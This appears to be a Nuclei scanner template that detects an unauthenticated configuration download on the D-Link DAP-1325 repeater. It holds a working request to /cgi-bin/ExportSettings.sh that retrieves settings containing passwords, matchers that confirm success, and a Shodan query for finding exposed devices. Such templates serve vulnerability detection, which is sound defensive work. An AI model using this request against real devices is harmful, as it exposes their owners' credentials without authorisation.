id: dlink-config-dump info: name: D-Link DAP-1325 - Information Disclosure author: gy741 severity: critical description: | Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. reference: - https://www.exploit-db.com/exploits/51556 - https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0 metadata: max-request: 1 shodan-query: title:"D-LINK" tags: config,dump,dlink,auth-bypass,disclosure http: - method: GET path: - "{{BaseURL}}/cgi-bin/ExportSettings.sh" matchers-condition: and matchers: - type: word part: body words: - "Password" case-insensitive: true - type: regex part: header regex: - 'filename="(.*)_Settings.dat' - 'application/octet-stream' condition: and - type: status status: - 200 # digest: 4a0a004730450220068e910828cfaeb52c0560554c8d58d4c912697c6b72f27386be55f94bbc0667022100cfd90703a2e72f24ef94ed234d4ed7404e3b4fbd6c9cac193adb230bc4d4ca9a:922c64590222798bb761d5b6d8e72950